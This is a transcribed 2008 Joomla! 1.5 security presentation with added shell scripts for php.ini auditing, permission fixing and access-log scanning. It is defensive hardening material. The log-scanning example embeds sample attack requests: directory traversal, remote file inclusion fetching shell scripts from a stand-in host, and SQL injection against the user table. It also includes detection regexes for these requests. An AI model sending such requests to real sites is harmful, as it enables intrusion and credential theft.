joomladay switzerland - security

Post on 18-Jan-2015

Joomladay Switzerland - security.ppt

Joomla! 1.5 Security

Joomla!day Presentation

Luzern, Switzerland

15 November 2008

Is Joomla! safe?

Is the World Wide Web Safe?

You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear?

Is Joomla! safe?

Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

I would say: anyone who tells a community that a Web site or an out-of-the-box solution is safe is not being responsible. No, it is not "safe" on the Internet.

Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

What is this presentation about?

• Getting Started
• Hosting and Server Setup
• Joomla Setup
• Site Administration
• Site Recovery

Presentation overview

Presentation approach taken from http://docs.joomla.org/Category:Security_Checklist

Getting started

Some basic things before we go into details:

• Report (possible) hacks to the JSST: http://developer.joomla.org/security/contact-the-team.html
• Please don't report hacks or proof-of-concepts out in the open; report them to the JSST instead
• Stay informed!
  – Automatic e-mail notification: http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
  – RSS feed: http://feeds.joomla.org/JoomlaSecurityNews

Hosting and server set up

Shared hosting?

Or

Dedicated hosting?

Hosting and server set up

• Configure Apache:
  – Secure important areas with .htaccess
  – Use mod_rewrite and mod_security to block PHP attacks
• Configure MySQL:
  – Implement user accounts following the "need-to-know" principle
• Configure PHP:
  – Use PHP 5!
  – Configure your php.ini file properly (most of the time this is limited on shared hosts)

Hosting and server set up

• Configure php.ini:
  – Use "disable_functions" to disable dangerous PHP functions that are not needed by your site
  – Use PHP "open_basedir" to confine scripts to the directories they need
  – Don't rely on PHP "safe_mode" (it gives a false sense of security)
  – Don't use PHP "register_globals"
  – Don't use PHP "allow_url_fopen". This option enables the URL-aware fopen wrappers, which let scripts open remote URLs as if they were local files. The related "allow_url_include" (a separate directive since PHP 5.2) controls whether include/require can load code from a URL and should be off as well.
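As an added example (not part of the original slides), here is a small POSIX shell audit of a php.ini against the settings listed above. It also shows why the compiled-in defaults matter: allow_url_fopen defaults to On, so a php.ini that merely omits the directive is still open. The directive names are the real PHP 5-era ones; the two sample ini files, their values and the function names (ini_get, check_off, audit_php_ini, write_samples) are assumptions constructed for this demonstration.

```shell
#!/bin/sh
# Added example (not from the slides): check a php.ini against the settings
# recommended above. The directive names are the real PHP 5-era ones; the two
# sample files written below are constructed for the demonstration.

# ini_get FILE DIRECTIVE -> effective value: last uncommented assignment wins
# (as in PHP), surrounding quotes and trailing ; comments stripped, empty if unset.
ini_get() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" \
        | sed -e 's/[[:space:]]*;.*$//' -e 's/^"\(.*\)"$/\1/' \
        | tail -n 1
}

# is_off VALUE -> true if php.ini would treat VALUE as boolean false.
is_off() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        ''|0|off|false|no|none) return 0 ;;
        *) return 1 ;;
    esac
}

# check_off FILE DIRECTIVE DEFAULT -> true if DIRECTIVE is off, using the
# compiled-in DEFAULT when the file does not set it (allow_url_fopen defaults
# to On, so an ini that merely omits it is still open).
check_off() {
    v=$(ini_get "$1" "$2"); [ -n "$v" ] || v=$3
    is_off "$v"
}

# audit_php_ini FILE -> prints one FAIL line per finding; exit status = count.
audit_php_ini() {
    f=$1; n=0
    check_off "$f" register_globals Off  || { echo "FAIL: register_globals must be Off"; n=$((n+1)); }
    check_off "$f" allow_url_fopen On    || { echo "FAIL: allow_url_fopen should be Off"; n=$((n+1)); }
    check_off "$f" allow_url_include Off || { echo "FAIL: allow_url_include must be Off"; n=$((n+1)); }
    check_off "$f" safe_mode Off         || { echo "FAIL: safe_mode is on; do not rely on it"; n=$((n+1)); }
    [ -n "$(ini_get "$f" open_basedir)" ]      || { echo "FAIL: open_basedir is not set"; n=$((n+1)); }
    [ -n "$(ini_get "$f" disable_functions)" ] || { echo "FAIL: disable_functions is empty"; n=$((n+1)); }
    return $n
}

# write_samples DIR -> constructed weak.ini (typical 2008 shared host) and
# hardened.ini (the slide's recommendations applied).
write_samples() {
    cat >"$1/weak.ini" <<'EOF'
; constructed sample: insecure settings
register_globals = On
safe_mode = On          ; looks protective, is not
allow_url_fopen = On
; open_basedir left unset
disable_functions =
EOF
    cat >"$1/hardened.ini" <<'EOF'
; constructed sample: hardened settings
register_globals = Off
safe_mode = Off
allow_url_fopen = Off
allow_url_include = Off
open_basedir = "/var/www/html:/tmp"
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
EOF
}

dir=$(mktemp -d)
write_samples "$dir"
for ini in weak hardened; do
    echo "== $ini.ini =="
    if audit_php_ini "$dir/$ini.ini"; then
        echo "no findings"
    else
        echo "$? finding(s)"
    fi
done
```

Point audit_php_ini at the php.ini your host actually loads (phpinfo() shows the path under "Loaded Configuration File"); on shared hosting where you cannot edit it, the same checks tell you which values to request from the provider.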

Joomla! setup

• Some basic rules to think about:
  – Only install official Joomla! versions!
  – Change the default administrator username
  – Protect directories and files
    • Move crucial files outside the public directory: http://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F
    • Ensure that all configurable paths to writable or uploadable directories
    • Protect your log directory (move it out of the document root or protect it with .htaccess)
  – Adjust file and directory permissions
    • Set critical directories to 755
    • Set file permissions to 644
  – Remove unneeded files
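The permission rule above (755 for directories, 644 for files), as an added shell example that is not from the slides: a find-based check that lists every entry deviating from the rule, and a fixer that applies it to a whole tree. The sample site tree and the function names (find_bad_perms, count_bad_perms, fix_perms, make_sample_site) are constructed for the demonstration. Run the check against your own document root first; anything the web server genuinely must write to (upload, cache and tmp directories are the usual cases) should then be handled as a deliberate exception rather than by a blanket chmod.

```shell
#!/bin/sh
# Added example (not from the slides): find and fix files and directories in a
# Joomla! document root that deviate from the 755 (directories) / 644 (files)
# rule on the slide. The sample tree is constructed here for the demonstration.

# find_bad_perms ROOT -> one line per directory not 0755 or file not 0644.
find_bad_perms() {
    find "$1" -type d ! -perm 755 -print | sed 's/^/DIR  /'
    find "$1" -type f ! -perm 644 -print | sed 's/^/FILE /'
}

# count_bad_perms ROOT -> number of deviating entries (printed, no padding).
count_bad_perms() {
    find_bad_perms "$1" | wc -l | tr -d ' '
}

# fix_perms ROOT -> apply the slide's rule to the whole tree.
# -exec ... + batches paths into few chmod calls, so it is fine on large sites.
fix_perms() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# make_sample_site DIR -> constructed tree with two world-writable entries of
# the kind a careless "chmod -R 777" leaves behind.
make_sample_site() {
    mkdir -p "$1/administrator" "$1/logs" "$1/tmp"
    touch "$1/index.php" "$1/configuration.php" "$1/logs/error.php"
    chmod 755 "$1" "$1/administrator" "$1/tmp"
    chmod 777 "$1/logs"                    # world-writable log directory
    chmod 644 "$1/index.php" "$1/logs/error.php"
    chmod 666 "$1/configuration.php"       # world-writable config file
}

site=$(mktemp -d)
make_sample_site "$site"
echo "Before:"; find_bad_perms "$site"
fix_perms "$site"
echo "After: $(count_bad_perms "$site") deviating entries"
```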

Joomla! setup

• Before you install extensions:
  – Always back up (even on your test system)
  – Always test before you install on your live server
  – Check for extension vulnerabilities
  – Download from trusted sites
  – User beware! Check the code quality
  – Test! Test! Test!
  – Remove junk files (everything that is not needed)
  – Avoid encrypted (obfuscated) code

Site administration

• Use well-formed passwords
• Maintain a strong site backup process
• Monitor crack attempts (Tripwire, Samhain)
• Perform manual intrusion detection (manual log file scan)
• Stay current with security patches and upgrades

Site administration

• Get help the right way
• Follow a logical and rigorous recovery process
• Reset your administrator password (and those of all admins/super admins)
• Find exploit attempts using the *NIX shell
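The manual log-file scan and the "find exploit attempts using the *NIX shell" point above, as an added example that is not from the slides: a grep pattern set for the request shapes typical of attacks on Joomla! 1.x-era sites, run over a constructed Apache combined-format access log, plus a per-source tally of the hits. The log lines, the addresses (RFC 5737 documentation ranges) and the hypothetical com_example component are assumptions; the pattern list is a starting point to extend, not a complete signature set.

```shell
#!/bin/sh
# Added example (not from the slides): a manual log-file scan of the kind the
# slide means by "find exploit attempts using the *NIX shell". The patterns are
# a starting set for Joomla! 1.x-era attacks, not a complete signature list;
# the access log below is constructed (RFC 5737 addresses, a hypothetical
# com_example component) for the demonstration.

# Extended regex, one alternative per attack class (matched case-insensitively):
#   =http://... in a parameter    remote file inclusion via a URL-valued parameter
#   mosConfig_absolute_path=      the classic Mambo/Joomla! 1.0 RFI parameter
#   ../../ or %2e%2e%2f           directory traversal (plain or URL-encoded)
#   union [all] select            SQL injection in the query string
ATTACK_PATTERNS='=(https?|ftp)://[^ "&]+|mosConfig_absolute_path=|(\.\./|%2e%2e(/|%2f)){2,}|union(%20|[+]| )+(all(%20|[+]| )+)?select'

# scan_access_log [FILE...] -> print every request line matching a pattern
# (reads stdin when no file is given, so it also works on zcat'ed rotated logs)
scan_access_log() {
    grep -E -i -e "$ATTACK_PATTERNS" "$@"
}

# top_attackers [FILE...] -> "ip count" per source address, busiest first
top_attackers() {
    scan_access_log "$@" | awk '{print $1}' | sort | uniq -c | sort -rn \
        | awk '{print $2, $1}'
}

# write_sample_log FILE -> constructed Apache combined-format log: two normal
# requests, then traversal, RFI (twice) and SQL injection attempts
write_sample_log() {
    cat >"$1" <<'EOF'
10.0.0.5 - - [15/Nov/2008:10:01:02 +0100] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Nov/2008:10:01:05 +0100] "GET /templates/rhuk_milkyway/css/template.css HTTP/1.1" 200 9876 "http://www.example.com/" "Mozilla/5.0"
192.0.2.77 - - [15/Nov/2008:10:07:41 +0100] "GET /index.php?option=com_example&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1044 "-" "libwww-perl/5.805"
192.0.2.77 - - [15/Nov/2008:10:07:43 +0100] "GET /components/com_example/example.php?mosConfig_absolute_path=http://203.0.113.9/r57.txt? HTTP/1.1" 200 310 "-" "libwww-perl/5.805"
198.51.100.23 - - [15/Nov/2008:10:12:09 +0100] "GET /index.php?option=com_content&id=12+union+all+select+1,username,password+from+jos_users-- HTTP/1.1" 200 6210 "-" "Mozilla/4.0"
192.0.2.77 - - [15/Nov/2008:10:15:00 +0100] "GET /index.php?option=com_example&file=https://203.0.113.9/shell.txt HTTP/1.1" 200 290 "-" "libwww-perl/5.805"
EOF
}

log=$(mktemp)
write_sample_log "$log"
echo "== suspicious requests =="; scan_access_log "$log"
echo "== by source =="; top_attackers "$log"
```

Note that the second sample line carries an http:// referer but is not flagged: the RFI pattern requires the URL to follow a "=" inside the request, which is what distinguishes an injected parameter from ordinary referer noise. A 200 status on a flagged line (as in the constructed RFI hits) is the case to investigate first, since it means the request was not rejected.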

Site recovery


Links

• Documentation wiki : http://docs.joomla.org/Category:Security_Checklist

• Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html

• Report issues to JSST : http://developer.joomla.org/security/contact-the-team.html


Links

Joomla! related

• www.joomla.org

• developer.joomla.org/security.html

• www.secunia.org

• www.milw0rm.com

Sites to put RSS feeds on

• http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

General

• www.us-cert.gov

• www.frsirt.com

Operating systems related

• www.debian.org/security

• www.openbsd.org/security

• www.redhat.org/apps/support


Sites to monitor when you take security seriously

Joomla!

“All together”


Questions?
